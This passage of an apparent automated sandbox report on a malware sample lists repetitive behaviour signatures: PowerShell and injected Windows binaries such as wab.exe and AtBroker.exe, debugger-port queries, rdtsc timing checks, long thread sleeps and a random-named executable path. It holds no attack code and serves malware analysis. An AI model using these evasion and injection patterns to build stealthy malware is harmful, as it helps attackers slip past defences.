        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\AtBroker.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\AtBroker.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\AtBroker.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\AtBroker.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\AtBroker.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_23331763 rdtsc 12_2_23331763
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9911Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9917Jump to behavior
        Source: C:\Windows\SysWOW64\AtBroker.exeWindow / User API: threadDelayed 9852Jump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeAPI coverage: 0.6 %
        Source: C:\Windows\SysWOW64\AtBroker.exeAPI coverage: 3.4 %
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5164Thread sleep count: 9917 > 30Jump to behavior
        Source: C:\Windows\SysWOW64\AtBroker.exe TID: 4384Thread sleep count: 121 > 30Jump to behavior
        Source: C:\Windows\SysWOW64\AtBroker.exe TID: 4384Thread sleep time: -242000s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\AtBroker.exe TID: 4384Thread sleep count: 9852 > 30Jump to behavior
        Source: C:\Windows\SysWOW64\AtBroker.exe TID: 4384Thread sleep time: -19704000s >= -30000sJump to behavior
        Source: C:\Program Files (x86)\jaHRMeRtobfWsKpFuHFpQhPymURiOXSszhwZGlWopGNKE\TJxNjwSdogTKaRdGyTBETCcxFSSkfL.exe TID: 1208Thread sleep time: -30000s >= -30000sJump to behavior
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\SysWOW64\AtBroker.exeLast function: Thread delayed
        Source: C:\Windows\SysWOW64\AtBroker.exeLast function: Thread delayed
        Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 15_2_02ABD1C0 FindFirstFileW,FindNextFileW,FindClose,15_2_02ABD1C0
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
        Source: powershell.exe, 00000006.00000002.20477959006.0000025A3ADF2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess queried: DebugPortJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess queried: DebugPortJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess queried: DebugPortJump to behavior
        Source: C:\Windows\SysWOW64\AtBroker.exeProcess queried: DebugPortJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_23331763 rdtsc 12_2_23331763
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0338DB10 LdrInitializeThunk,10_2_0338DB10
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_232EE328 mov eax, dword ptr fs:[00000030h]12_2_232EE328
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_232EE328 mov eax, dword ptr fs:[00000030h]12_2_232EE328
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_232EE328 mov eax, dword ptr fs:[00000030h]12_2_232EE328
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_233C3336 mov eax, dword ptr fs:[00000030h]12_2_233C3336
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_23328322 mov eax, dword ptr fs:[00000030h]12_2_23328322
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_23328322 mov eax, dword ptr fs:[00000030h]12_2_23328322
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_23328322 mov eax, dword ptr fs:[00000030h]12_2_23328322
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2331332D mov eax, dword ptr fs:[00000030h]12_2_2331332D
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2330E310 mov eax, dword ptr fs:[00000030h]12_2_2330E310
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2330E310 mov eax, dword ptr fs:[00000030h]12_2_2330E310
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2330E310 mov eax, dword ptr fs:[00000030h]12_2_2330E310
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_232E9303 mov eax, dword ptr fs:[00000030h]12_2_232E9303
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_232E9303 mov eax, dword ptr fs:[00000030h]12_2_232E9303
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2332631F mov eax, dword ptr fs:[00000030h]12_2_2332631F
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_233AF30A mov eax, dword ptr fs:[00000030h]12_2_233AF30A
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2337330C mov eax, dword ptr fs:[00000030h]12_2_2337330C
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2337330C mov eax, dword ptr fs:[00000030h]12_2_2337330C
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2337330C mov eax, dword ptr fs:[00000030h]12_2_2337330C
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2337330C mov eax, dword ptr fs:[00000030h]12_2_2337330C
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2336E372 mov eax, dword ptr fs:[00000030h]12_2_2336E372
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2336E372 mov eax, dword ptr fs:[00000030h]12_2_2336E372
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2336E372 mov eax, dword ptr fs:[00000030h]12_2_2336E372
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2336E372 mov eax, dword ptr fs:[00000030h]12_2_2336E372
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_23370371 mov eax, dword ptr fs:[00000030h]12_2_23370371
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_23370371 mov eax, dword ptr fs:[00000030h]12_2_23370371
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2331237A mov eax, dword ptr fs:[00000030h]12_2_2331237A
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_232FB360 mov eax, dword ptr fs:[00000030h]12_2_232FB360
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_232FB360 mov eax, dword ptr fs:[00000030h]12_2_232FB360
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_232FB360 mov eax, dword ptr fs:[00000030h]12_2_232FB360
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_232FB360 mov eax, dword ptr fs:[00000030h]12_2_232FB360
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_232FB360 mov eax, dword ptr fs:[00000030h]12_2_232FB360
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_232FB360 mov eax, dword ptr fs:[00000030h]12_2_232FB360
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2332E363 mov eax, dword ptr fs:[00000030h]12_2_2332E363
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2332E363 mov eax, dword ptr fs:[00000030h]12_2_2332E363
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2332E363 mov eax, dword ptr fs:[00000030h]12_2_2332E363
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2332E363 mov eax, dword ptr fs:[00000030h]12_2_2332E363
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2332E363 mov eax, dword ptr fs:[00000030h]12_2_2332E363
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2332E363 mov eax, dword ptr fs:[00000030h]12_2_2332E363
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2332E363 mov eax, dword ptr fs:[00000030h]12_2_2332E363
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2332E363 mov eax, dword ptr fs:[00000030h]12_2_2332E363
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_232E8347 mov eax, dword ptr fs:[00000030h]12_2_232E8347
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_232E8347 mov eax, dword ptr fs:[00000030h]12_2_232E8347
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_232E8347 mov eax, dword ptr fs:[00000030h]12_2_232E8347
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2336C3B0 mov eax, dword ptr fs:[00000030h]12_2_2336C3B0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_232F93A6 mov eax, dword ptr fs:[00000030h]12_2_232F93A6
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_232F93A6 mov eax, dword ptr fs:[00000030h]12_2_232F93A6
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2331A390 mov eax, dword ptr fs:[00000030h]12_2_2331A390
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2331A390 mov eax, dword ptr fs:[00000030h]12_2_2331A390
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2331A390 mov eax, dword ptr fs:[00000030h]12_2_2331A390
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_232F1380 mov eax, dword ptr fs:[00000030h]12_2_232F1380
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_232F1380 mov eax, dword ptr fs:[00000030h]12_2_232F1380
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_232F1380 mov eax, dword ptr fs:[00000030h]12_2_232F1380
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_232F1380 mov eax, dword ptr fs:[00000030h]12_2_232F1380
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_232F1380 mov eax, dword ptr fs:[00000030h]12_2_232F1380
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2330F380 mov eax, dword ptr fs:[00000030h]12_2_2330F380
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2330F380 mov eax, dword ptr fs:[00000030h]12_2_2330F380
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2330F380 mov eax, dword ptr fs:[00000030h]12_2_2330F380
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2330F380 mov eax, dword ptr fs:[00000030h]12_2_2330F380
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2330F380 mov eax, dword ptr fs:[00000030h]12_2_2330F380
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2330F380 mov eax, dword ptr fs:[00000030h]12_2_2330F380
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_233AF38A mov eax, dword ptr fs:[00000030h]12_2_233AF38A
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_233233D0 mov eax, dword ptr fs:[00000030h]12_2_233233D0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_233743D5 mov eax, dword ptr fs:[00000030h]12_2_233743D5
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_233243D0 mov ecx, dword ptr fs:[00000030h]12_2_233243D0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_232F63CB mov eax, dword ptr fs:[00000030h]12_2_232F63CB
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_232EC3C7 mov eax, dword ptr fs:[00000030h]12_2_232EC3C7
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_232EE3C0 mov eax, dword ptr fs:[00000030h]12_2_232EE3C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_232EE3C0 mov eax, dword ptr fs:[00000030h]12_2_232EE3C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_232EE3C0 mov eax, dword ptr fs:[00000030h]12_2_232EE3C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_23310230 mov ecx, dword ptr fs:[00000030h]12_2_23310230
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_23370227 mov eax, dword ptr fs:[00000030h]12_2_23370227
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_23370227 mov eax, dword ptr fs:[00000030h]12_2_23370227
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_23370227 mov eax, dword ptr fs:[00000030h]12_2_23370227
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2332A22B mov eax, dword ptr fs:[00000030h]12_2_2332A22B
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2332A22B mov eax, dword ptr fs:[00000030h]12_2_2332A22B
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2332A22B mov eax, dword ptr fs:[00000030h]12_2_2332A22B
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2337B214 mov eax, dword ptr fs:[00000030h]12_2_2337B214
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2337B214 mov eax, dword ptr fs:[00000030h]12_2_2337B214
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_232EA200 mov eax, dword ptr fs:[00000030h]12_2_232EA200
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_232E821B mov eax, dword ptr fs:[00000030h]12_2_232E821B
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2338327E mov eax, dword ptr fs:[00000030h]12_2_2338327E
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2338327E mov eax, dword ptr fs:[00000030h]12_2_2338327E
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2338327E mov eax, dword ptr fs:[00000030h]12_2_2338327E
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2338327E mov eax, dword ptr fs:[00000030h]12_2_2338327E
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2338327E mov eax, dword ptr fs:[00000030h]12_2_2338327E
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2338327E mov eax, dword ptr fs:[00000030h]12_2_2338327E
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_233AD270 mov eax, dword ptr fs:[00000030h]12_2_233AD270
